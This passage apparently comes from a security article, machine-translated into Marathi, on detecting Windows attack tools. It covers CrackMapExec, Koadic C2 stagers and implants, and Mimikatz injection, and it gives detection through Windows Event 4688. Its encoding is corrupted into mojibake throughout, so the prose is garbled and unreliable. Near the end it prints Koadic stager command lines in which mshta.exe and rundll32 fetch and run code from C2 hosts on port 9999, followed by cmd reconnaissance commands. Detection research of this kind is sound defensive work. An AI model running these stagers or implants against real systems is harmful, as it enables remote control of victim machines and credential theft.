рдХреЗрд▓рд╛ рдЬрд╛рдИрд▓. рддреНрдпрд╛рдд рд╡рд┐рдирдВрддреА рдкрд╛рдард╡рд▓реЗрд▓реНрдпрд╛ рд╡рд╛рдкрд░рдХрд░реНрддреНрдпрд╛рдЪреЗ рдирд╛рд╡ рдЖрдгрд┐ rootSecurityCenter2 рдиреЗрдорд╕реНрдкреЗрд╕рдордзреНрдпреЗ рдирд╛рд╡ рдЕрд╕реЗрд▓.

рдкреНрд░рддреНрдпреЗрдХ CME рдореЙрдбреНрдпреВрд▓рдЪреА рд╕реНрд╡рддрдГрдЪреА рдХрд▓рд╛рдХреГрддреА рд╣реЛрддреА, рдордЧ рддреА рд╡рд┐рд╢рд┐рд╖реНрдЯ WQL рдХреНрд╡реЗрд░реА рдЕрд╕реЛрдд рдХрд┐рдВрд╡рд╛ LDAP рдЖрдгрд┐ SMB рдордзреАрд▓ рдЕрд╕реНрдкрд╖реНрдЯрддрд╛ рдЖрдгрд┐ рдмреНрд▓рдбрд╣рд╛рдКрдВрдб-рд╡рд┐рд╢рд┐рд╖реНрдЯ рдХреНрд░рд┐рдпрд╛рдХрд▓рд╛рдк рдЕрд╕рд▓реЗрд▓реНрдпрд╛ рдЯрд╛рд╕реНрдХ рд╢реЗрдбреНрдпреБрд▓рд░рдордзреНрдпреЗ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдкреНрд░рдХрд╛рд░рдЪреНрдпрд╛ рдЯрд╛рд╕реНрдХрдЪреА рдирд┐рд░реНрдорд┐рддреА рдЕрд╕реЛ.

рдХреЛрдЖрдбрд┐рдХ

Koadic рдЪреЗ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╡реИрд╢рд┐рд╖реНрдЯреНрдп рдореНрд╣рдгрдЬреЗ Windows рдордзреНрдпреЗ рддрдпрд╛рд░ рдХреЗрд▓реЗрд▓реЗ JavaScript рдЖрдгрд┐ VBScript рджреБрднрд╛рд╖реНрдпрд╛рдВрдЪрд╛ рд╡рд╛рдкрд░. рдпрд╛ рдЕрд░реНрдерд╛рдиреЗ, рддреЗ рд▓рд┐рд╡реНрд╣рд┐рдВрдЧ рдСрдл рдж рд▓рдБрдб рдЯреНрд░реЗрдВрдбрдЪреЗ рдЕрдиреБрд╕рд░рдг рдХрд░рддреЗ - рдореНрд╣рдгрдЬреЗрдЪ, рддреНрдпрд╛рдд рдХреЛрдгрддреЗрд╣реА рдмрд╛рд╣реНрдп рдЕрд╡рд▓рдВрдмрд┐рддреНрд╡ рдирд╛рд╣реА рдЖрдгрд┐ рдорд╛рдирдХ рд╡рд┐рдВрдбреЛрдЬ рдЯреВрд▓реНрд╕ рд╡рд╛рдкрд░рддрд╛рдд. рд╣реЗ рд╕рдВрдкреВрд░реНрдг рдХрдорд╛рдВрдб рдЕрдБрдб рдХрдВрдЯреНрд░реЛрд▓ (CnC) рд╕рд╛рдареА рдПрдХ рд╕рд╛рдзрди рдЖрд╣реЗ, рдХрд╛рд░рдг рд╕рдВрдХреНрд░рдордгрд╛рдирдВрддрд░ рдорд╢реАрдирд╡рд░ "рдЗрдореНрдкреНрд▓рд╛рдВрдЯ" рд╕реНрдерд╛рдкрд┐рдд рдХреЗрд▓реЗ рдЬрд╛рддреЗ, рдЬреНрдпрд╛рдореБрд│реЗ рддреЗ рдирд┐рдпрдВрддреНрд░рд┐рдд рдХреЗрд▓реЗ рдЬрд╛рдК рд╢рдХрддреЗ. рдЕрд╢рд╛ рдорд╢реАрдирд▓рд╛, рдХреЛрдПрдбрд┐рдХ рд╢рдмреНрджрд╛рд╡рд▓реАрдд, "рдЭреЛрдореНрдмреА" рдореНрд╣рдгрддрд╛рдд. рдкреАрдбрд┐рддреЗрдЪреНрдпрд╛ рдмрд╛рдЬреВрдиреЗ рдкреВрд░реНрдг рдСрдкрд░реЗрд╢рдирд╕рд╛рдареА рдЕрдкреБрд░реЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдЕрд╕рд▓реНрдпрд╛рд╕, Koadic рдХрдбреЗ рд╡рд╛рдкрд░рдХрд░реНрддрд╛ рдЦрд╛рддреЗ рдирд┐рдпрдВрддреНрд░рдг рдмрд╛рдпрдкрд╛рд╕ (UAC рдмрд╛рдпрдкрд╛рд╕) рддрдВрддреНрд░ рд╡рд╛рдкрд░реВрди рддреНрдпрд╛рдВрдирд╛ рд╡рд╛рдврд╡рдгреНрдпрд╛рдЪреА рдХреНрд╖рдорддрд╛ рдЖрд╣реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 10. рдХреЛрдЖрдбрд┐рдХ рд╢реЗрд▓

рдкреАрдбрд┐рддреЗрдиреЗ рдХрдорд╛рдВрдб рдЖрдгрд┐ рдХрдВрдЯреНрд░реЛрд▓ рд╕рд░реНрд╡реНрд╣рд░рд╕рд╣ рд╕рдВрдкреНрд░реЗрд╖рдг рд╕реБрд░реВ рдХреЗрд▓реЗ рдкрд╛рд╣рд┐рдЬреЗ. рд╣реЗ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА, рддрд┐рд▓рд╛ рдкреВрд░реНрд╡реА рддрдпрд╛рд░ рдХреЗрд▓реЗрд▓реНрдпрд╛ рдпреВрдЖрд░рдЖрдпрд╢реА рд╕рдВрдкрд░реНрдХ рд╕рд╛рдзрдгреНрдпрд╛рдЪреА рдЖрдгрд┐ рд╕реНрдЯреЗрдЬрд░реНрд╕рдкреИрдХреА рдПрдХ рд╡рд╛рдкрд░реВрди рдореБрдЦреНрдп рдХреЛрдПрдбрд┐рдХ рд╢рд░реАрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░рдгреЗ рдЖрд╡рд╢реНрдпрдХ рдЖрд╣реЗ. рдЕрдВрдЬреАрд░ рдордзреНрдпреЗ. рдЖрдХреГрддреА 11 mshta рд╕реНрдЯреЗрдЬрд░рдЪреЗ рдЙрджрд╛рд╣рд░рдг рджрд╛рдЦрд╡рддреЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 11. CnC рд╕рд░реНрд╡реНрд╣рд░рд╕рд╣ рд╕рддреНрд░ рд╕реБрд░реВ рдХрд░рдгреЗ

рдкреНрд░рддрд┐рд╕рд╛рдж рд╡реНрд╣реЗрд░рд┐рдПрдмрд▓ WS рдЪреНрдпрд╛ рдЖрдзрд╛рд░реЗ, рд╣реЗ рд╕реНрдкрд╖реНрдЯ рд╣реЛрддреЗ рдХреА рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреА WScript.Shell рджреНрд╡рд╛рд░реЗ рд╣реЛрддреЗ рдЖрдгрд┐ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE рд╡реНрд╣реЗрд░рд┐рдПрдмрд▓реНрд╕рдордзреНрдпреЗ рдЪрд╛рд▓реВ рд╕рддреНрд░рд╛рдЪреНрдпрд╛ рдкреЕрд░рд╛рдореАрдЯрд░реНрд╕рдмрджреНрджрд▓ рдореБрдЦреНрдп рдорд╛рд╣рд┐рддреА рдЕрд╕рддреЗ. рд╕реАрдПрдирд╕реА рд╕рд░реНрд╡реНрд╣рд░рд╕рд╣ HTTP рдХрдиреЗрдХреНрд╢рдирдордзреАрд▓ рд╣реА рдкрд╣рд┐рд▓реА рд╡рд┐рдирдВрддреА-рдкреНрд░рддрд┐рд╕рд╛рдж рдЬреЛрдбреА рдЖрд╣реЗ. рддреНрдпрд╛рдирдВрддрд░рдЪреНрдпрд╛ рд╡рд┐рдирдВрддреНрдпрд╛ рдереЗрдЯ рдореЙрдбреНрдпреБрд▓реНрд╕ (рдЗрдореНрдкреНрд▓рд╛рдВрдЯ) рдЪреНрдпрд╛ рдХрд╛рд░реНрдпрдХреНрд╖рдорддреЗрд╢реА рд╕рдВрдмрдВрдзрд┐рдд рдЖрд╣реЗрдд. рд╕рд░реНрд╡ рдХреЛрдПрдбрд┐рдХ рдореЙрдбреНрдпреВрд▓реНрд╕ рдХреЗрд╡рд│ CnC рд╕рд╣ рд╕рдХреНрд░рд┐рдп рд╕рддреНрд░рд╛рд╕рд╣ рдХрд╛рд░реНрдп рдХрд░рддрд╛рдд.

рдорд┐рдорд┐рдХреЕрдЯреНрдЬ

рдЬрд╕реЗ CME Bloodhound рд╕рд╣ рдХрд╛рд░реНрдп рдХрд░рддреЗ, Koadic Mimikatz рд╕реЛрдмрдд рд╕реНрд╡рддрдВрддреНрд░ рдкреНрд░реЛрдЧреНрд░рд╛рдо рдореНрд╣рдгреВрди рдХрд╛рд░реНрдп рдХрд░рддреЗ рдЖрдгрд┐ рддреЗ рд▓рд╛рдБрдЪ рдХрд░рдгреНрдпрд╛рдЪреЗ рдЕрдиреЗрдХ рдорд╛рд░реНрдЧ рдЖрд╣реЗрдд. рдЦрд╛рд▓реА Mimikatz рдЗрдореНрдкреНрд▓рд╛рдВрдЯ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рд╡рд┐рдирдВрддреА-рдкреНрд░рддрд┐рд╕рд╛рдж рдЬреЛрдбреА рдЖрд╣реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 12. Mimikatz Koadic рд▓рд╛ рд╣рд╕реНрддрд╛рдВрддрд░рд┐рдд рдХрд░рд╛

рд╡рд┐рдирдВрддреАрдордзреАрд▓ URI рдлреЙрд░рдореЕрдЯ рдХрд╕рд╛ рдмрджрд▓рд▓рд╛ рдЖрд╣реЗ рддреЗ рддреБрдореНрд╣реА рдкрд╛рд╣реВ рд╢рдХрддрд╛. рддреНрдпрд╛рдд рдЖрддрд╛ csrf рд╡реНрд╣реЗрд░рд┐рдПрдмрд▓рдЪреЗ рдореВрд▓реНрдп рдЖрд╣реЗ, рдЬреЗ рдирд┐рд╡рдбрд▓реЗрд▓реНрдпрд╛ рдореЙрдбреНрдпреВрд▓рд╕рд╛рдареА рдЬрдмрд╛рдмрджрд╛рд░ рдЖрд╣реЗ. рддрд┐рдЪреНрдпрд╛ рдирд╛рд╡рд╛рдХрдбреЗ рд▓рдХреНрд╖ рджреЗрдК рдирдХрд╛; рдЖрдкрд▓реНрдпрд╛ рд╕рд░реНрд╡рд╛рдВрдирд╛ рдорд╛рд╣рд┐рдд рдЖрд╣реЗ рдХреА CSRF рд╕рд╣рд╕рд╛ рд╡реЗрдЧрд│реНрдпрд╛ рдкрджреНрдзрддреАрдиреЗ рд╕рдордЬрд▓рд╛ рдЬрд╛рддреЛ. рдкреНрд░рддрд┐рд╕рд╛рдж рд╣рд╛ Koadic рдЪрд╛ рд╕рдорд╛рди рдореБрдЦреНрдп рднрд╛рдЧ рд╣реЛрддрд╛, рдЬреНрдпрд╛рдордзреНрдпреЗ Mimikatz рд╢реА рд╕рдВрдмрдВрдзрд┐рдд рдХреЛрдб рдЬреЛрдбрд▓рд╛ рдЧреЗрд▓рд╛ рд╣реЛрддрд╛. рддреЗ рдЦреВрдк рдореЛрдареЗ рдЖрд╣реЗ, рдореНрд╣рдгреВрди рдореБрдЦреНрдп рдореБрджреНрджреЗ рдкрд╛рд╣реВ. рдпреЗрдереЗ рдЖрдордЪреНрдпрд╛рдХрдбреЗ рдмреЗрд╕64 рдордзреНрдпреЗ рдПрдиреНрдХреЛрдб рдХреЗрд▓реЗрд▓реА Mimikatz рд▓рд╛рдпрдмреНрд░рд░реА рдЖрд╣реЗ, рдПрдХ рдЕрдиреБрдХреНрд░рдорд┐рдХ .NET рд╡рд░реНрдЧ рдЬреЛ рддреНрдпрд╛рд╕ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░реЗрд▓ рдЖрдгрд┐ Mimikatz рд▓рд╛рдБрдЪ рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдпреБрдХреНрддрд┐рд╡рд╛рдж рдХрд░реЗрд▓. рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреАрдЪрд╛ рдкрд░рд┐рдгрд╛рдо рд╕реНрдкрд╖реНрдЯ рдордЬрдХреБрд░рд╛рдд рдиреЗрдЯрд╡рд░реНрдХрд╡рд░ рдкреНрд░рд╕рд╛рд░рд┐рдд рдХреЗрд▓рд╛ рдЬрд╛рддреЛ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 13. рд░рд┐рдореЛрдЯ рдорд╢реАрдирд╡рд░ Mimikatz рдЪрд╛рд▓рд╡рдгреНрдпрд╛рдЪрд╛ рдкрд░рд┐рдгрд╛рдо

Exec_cmd

Koadic рдХрдбреЗ рдореЙрдбреНрдпреВрд▓реНрд╕ рджреЗрдЦреАрд▓ рдЖрд╣реЗрдд рдЬреЗ рджреВрд░рд╕реНрдердкрдгреЗ рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░реВ рд╢рдХрддрд╛рдд. рдпреЗрдереЗ рдЖрдкрдг рд╕рдорд╛рди URI рдЬрдирд░реЗрд╢рди рдкрджреНрдзрдд рдЖрдгрд┐ рдкрд░рд┐рдЪрд┐рдд sid рдЖрдгрд┐ csrf рд╡реНрд╣реЗрд░рд┐рдПрдмрд▓реНрд╕ рдкрд╛рд╣реВ. exec_cmd рдореЙрдбреНрдпреВрд▓рдЪреНрдпрд╛ рдмрд╛рдмрддреАрдд, рдХреЛрдб рд╢рд░реАрд░рд╛рдд рдЬреЛрдбрд▓рд╛ рдЬрд╛рддреЛ рдЬреЛ рд╢реЗрд▓ рдХрдорд╛рдВрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рд╕ рд╕рдХреНрд╖рдо рдЖрд╣реЗ. рдЦрд╛рд▓реА CnC рд╕рд░реНрд╡реНрд╣рд░рдЪреНрдпрд╛ HTTP рдкреНрд░рддрд┐рд╕рд╛рджрд╛рдд рдЕрд╕рд╛ рдХреЛрдб рджрд░реНрд╢рд╡рд┐рд▓рд╛ рдЖрд╣реЗ.

рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░рд╡рд░ рд╣рд▓реНрд▓реЗ рдХрд╕реЗ рд╢реЛрдзрд╛рдпрдЪреЗ: рд╣реЕрдХрд░ рдЯреВрд▓реНрд╕рдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреЗ
рддрд╛рдВрджреВрд│. 14. рдЗрдореНрдкреНрд▓рд╛рдВрдЯ рдХреЛрдб exec_cmd

рдкрд░рд┐рдЪрд┐рдд WS рд╡рд┐рд╢реЗрд╖рддрд╛ рдЕрд╕рд▓реЗрд▓реЗ GAWTUUGCFI рд╡реНрд╣реЗрд░рд┐рдПрдмрд▓ рдХреЛрдб рдЕрдВрдорд▓рдмрдЬрд╛рд╡рдгреАрд╕рд╛рдареА рдЖрд╡рд╢реНрдпрдХ рдЖрд╣реЗ. рддреНрдпрд╛рдЪреНрдпрд╛ рдорджрддреАрдиреЗ, рдЗрдореНрдкреНрд▓рд╛рдВрдЯ рд╢реЗрд▓рд▓рд╛ рдХреЙрд▓ рдХрд░рддреЗ, рдХреЛрдбрдЪреНрдпрд╛ рджреЛрди рд╢рд╛рдЦрд╛рдВрд╡рд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд░рддреЗ - shell.exec рдЖрдЙрдЯрдкреБрдЯ рдбреЗрдЯрд╛ рдкреНрд░рд╡рд╛рд╣ рдЖрдгрд┐ shell.run рдкрд░рдд рди рдХрд░рддрд╛.

рдХреЛрдЖрдбрд┐рдХ рд╣реЗ рдПрдХ рд╕рд╛рдорд╛рдиреНрдп рд╕рд╛рдзрди рдирд╛рд╣реА, рдкрд░рдВрддреБ рддреНрдпрд╛рдЪреНрдпрд╛ рд╕реНрд╡рддрдГрдЪреНрдпрд╛ рдХрд▓рд╛рдХреГрддреА рдЖрд╣реЗрдд рдЬреНрдпрд╛рджреНрд╡рд╛рд░реЗ рддреЗ рдХрд╛рдпрджреЗрд╢реАрд░ рд░рд╣рджрд╛рд░реАрдордзреНрдпреЗ рдЖрдврд│реВ рд╢рдХрддрд╛рдд:

  • HTTP рд╡рд┐рдирдВрддреНрдпрд╛рдВрдЪреА рд╡рд┐рд╢реЗрд╖ рдирд┐рд░реНрдорд┐рддреА,
  • winHttpRequests API рд╡рд╛рдкрд░реВрди,
  • ActiveXObject рджреНрд╡рд╛рд░реЗ WScript.Shell рдСрдмреНрдЬреЗрдХреНрдЯ рддрдпрд╛рд░ рдХрд░рдгреЗ,
  • рдореЛрдареА рдПрдХреНрдЭрд┐рдХреНрдпреБрдЯреЗрдмрд▓ рдмреЙрдбреА.

рдкреНрд░рд╛рд░рдВрднрд┐рдХ рдХрдиреЗрдХреНрд╢рди рд╕реНрдЯреЗрдЬрд░рджреНрд╡рд╛рд░реЗ рд╕реБрд░реВ рдХреЗрд▓реЗ рдЬрд╛рддреЗ, рддреНрдпрд╛рдореБрд│реЗ рд╡рд┐рдВрдбреЛрдЬ рдЗрд╡реНрд╣реЗрдВрдЯрджреНрд╡рд╛рд░реЗ рддреНрдпрд╛рдЪреА рдХреНрд░рд┐рдпрд╛рдХрд▓рд╛рдк рд╢реЛрдзрдгреЗ рд╢рдХреНрдп рдЖрд╣реЗ. mshta рд╕рд╛рдареА, рд╣рд╛ рдЗрд╡реНрд╣реЗрдВрдЯ 4688 рдЖрд╣реЗ, рдЬреЛ рдкреНрд░рд╛рд░рдВрдн рдЧреБрдгрдзрд░реНрдорд╛рд╕рд╣ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рддрдпрд╛рд░ рдХрд░рдгреНрдпрд╛рд╕ рд╕реВрдЪрд┐рдд рдХрд░рддреЛ:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

рдХреЛрдПрдбрд┐рдХ рдЪрд╛рд▓реВ рдЕрд╕рддрд╛рдирд╛, рддреБрдореНрд╣реА рдЗрддрд░ 4688 рдЗрд╡реНрд╣реЗрдВрдЯреНрд╕ рдкрд╛рд╣реВ рд╢рдХрддрд╛ рдЬреНрдпрд╛рдд рддреНрдпрд╛рдЪреЗ рд╡реИрд╢рд┐рд╖реНрдЯреНрдпрдкреВрд░реНрдг рд╡реИрд╢рд┐рд╖реНрдЯреНрдп рдЖрд╣реЗ:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

рдирд┐рд╖реНрдХрд░реНрд╖

рд▓рд┐рд╡реНрд╣рд┐рдВрдЧ рдСрдл рдж рд▓рдБрдб рдЯреНрд░реЗрдВрдб рдЧреБрдиреНрд╣реЗрдЧрд╛рд░рд╛рдВрдордзреНрдпреЗ рд▓реЛрдХрдкреНрд░рд┐рдп рд╣реЛрдд рдЖрд╣реЗ. рддреЗ рддреНрдпрд╛рдВрдЪреНрдпрд╛ рдЧрд░рдЬрд╛рдВрд╕рд╛рдареА рд╡рд┐рдВрдбреЛрдЬрдордзреНрдпреЗ рддрдпрд╛рд░ рдХреЗрд▓реЗрд▓реА рд╕рд╛рдзрдиреЗ рдЖрдгрд┐ рдпрдВрддреНрд░рдгрд╛ рд╡рд╛рдкрд░рддрд╛рдд. рдЖрдореНрд╣реА рд▓реЛрдХрдкреНрд░рд┐рдп рд╕рд╛рдзрдиреЗ рдкрд╣рд╛рдд рдЖрд╣реЛрдд Koadic, CrackMapExec рдЖрдгрд┐ Impacket рдпрд╛ рддрддреНрддреНрд╡рд╛рдЪреЗ рдЕрдиреБрд╕рд░рдг рдХрд░реВрди APT рдЕрд╣рд╡рд╛рд▓рд╛рдВрдордзреНрдпреЗ рд╡рд╛рдврддреНрдпрд╛ рдкреНрд░рдорд╛рдгрд╛рдд рджрд┐рд╕реВрди рдпреЗрдд рдЖрд╣реЗ. рдпрд╛ рд╕рд╛рдзрдирд╛рдВрд╕рд╛рдареА GitHub рд╡рд░ рдлреЙрд░реНрдХреНрд╕рдЪреА рд╕рдВрдЦреНрдпрд╛ рджреЗрдЦреАрд▓ рд╡рд╛рдврдд рдЖрд╣реЗ рдЖрдгрд┐ рдирд╡реАрди рджрд┐рд╕реВ рд▓рд╛рдЧрд▓реЗ рдЖрд╣реЗрдд (рдЖрддрд╛ рддреНрдпрд╛рдкреИрдХреА рд╕реБрдорд╛рд░реЗ рдПрдХ рд╣рдЬрд╛рд░ рдЖрдзреАрдЪ рдЖрд╣реЗрдд). рдЯреНрд░реЗрдВрдб рддреНрдпрд╛рдЪреНрдпрд╛ рд╕рд╛рдзреЗрдкрдгрд╛рдореБрд│реЗ рд▓реЛрдХрдкреНрд░рд┐рдп рд╣реЛрдд рдЖрд╣реЗ: рд╣рд▓реНрд▓реЗрдЦреЛрд░рд╛рдВрдирд╛ рддреГрддреАрдп-рдкрдХреНрд╖ рд╕рд╛рдзрдирд╛рдВрдЪреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╛рд╣реА; рддреЗ рдЖрдзреАрдЪ рдкреАрдбрд┐рддрд╛рдВрдЪреНрдпрд╛ рдорд╢реАрдирд╡рд░ рдЖрд╣реЗрдд рдЖрдгрд┐ рддреНрдпрд╛рдВрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрд╛рдпрд╛рдВрдирд╛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдгреНрдпрд╛рдд рдорджрдд рдХрд░рддрд╛рдд. рдЖрдореНрд╣реА рдиреЗрдЯрд╡рд░реНрдХ рдХрдореНрдпреБрдирд┐рдХреЗрд╢рдирдЪрд╛ рдЕрднреНрдпрд╛рд╕ рдХрд░рдгреНрдпрд╛рд╡рд░ рд▓рдХреНрд╖ рдХреЗрдВрджреНрд░рд┐рдд рдХрд░рддреЛ: рд╡рд░ рд╡рд░реНрдгрди рдХреЗрд▓реЗрд▓реЗ рдкреНрд░рддреНрдпреЗрдХ рд╕рд╛рдзрди рдиреЗрдЯрд╡рд░реНрдХ рд░рд╣рджрд╛рд░реАрдордзреНрдпреЗ рд╕реНрд╡рддрдГрдЪреЗ рдЯреНрд░реЗрд╕ рд╕реЛрдбрддреЗ; рддреНрдпрд╛рдВрдЪреНрдпрд╛ рддрдкрд╢реАрд▓рд╡рд╛рд░ рдЕрднреНрдпрд╛рд╕рд╛рдореБрд│реЗ рдЖрдореНрд╣рд╛рд▓рд╛ рдЖрдордЪреЗ рдЙрддреНрдкрд╛рджрди рд╢рд┐рдХрд╡рддрд╛ рдЖрд▓реЗ рдкреАрдЯреА рдиреЗрдЯрд╡рд░реНрдХ рд╣рд▓реНрд▓рд╛ рд╢реЛрдз рддреНрдпрд╛рдВрдирд╛ рд╢реЛрдзреВрди рдХрд╛рдврд╛, рдЬреЗ рд╢реЗрд╡рдЯреА рд╕рд╛рдпрдмрд░ рдШрдЯрдирд╛рдВрдЪреНрдпрд╛ рд╕рдВрдкреВрд░реНрдг рд╕рд╛рдЦрд│реАрдЪрд╛ рддрдкрд╛рд╕ рдХрд░рдгреНрдпрд╛рд╕ рдорджрдд рдХрд░рддреЗ.

рд▓реЗрдЦрдХ:

  • рдЕрдБрдЯреЛрди рдЯреНрдпреБрд░рд┐рди, рддрдЬреНрдЮ рд╕реЗрд╡рд╛ рд╡рд┐рднрд╛рдЧрд╛рдЪреЗ рдкреНрд░рдореБрдЦ, рдкреАрдЯреА рддрдЬреНрдЮ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдВрджреНрд░, рд╕рдХрд╛рд░рд╛рддреНрдордХ рддрдВрддреНрд░рдЬреНрдЮрд╛рди
  • рдПрдЧреЛрд░ рдкреЙрдбрдореЛрдХреЛрд╡реНрд╣, рддрдЬреНрдЮ, рдкреАрдЯреА рддрдЬреНрдЮ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдВрджреНрд░, рд╕рдХрд╛рд░рд╛рддреНрдордХ рддрдВрддреНрд░рдЬреНрдЮрд╛рди

рд╕реНрддреНрд░реЛрдд: www.habr.com

рдПрдХ рдЯрд┐рдкреНрдкрдгреА рдЬреЛрдбрд╛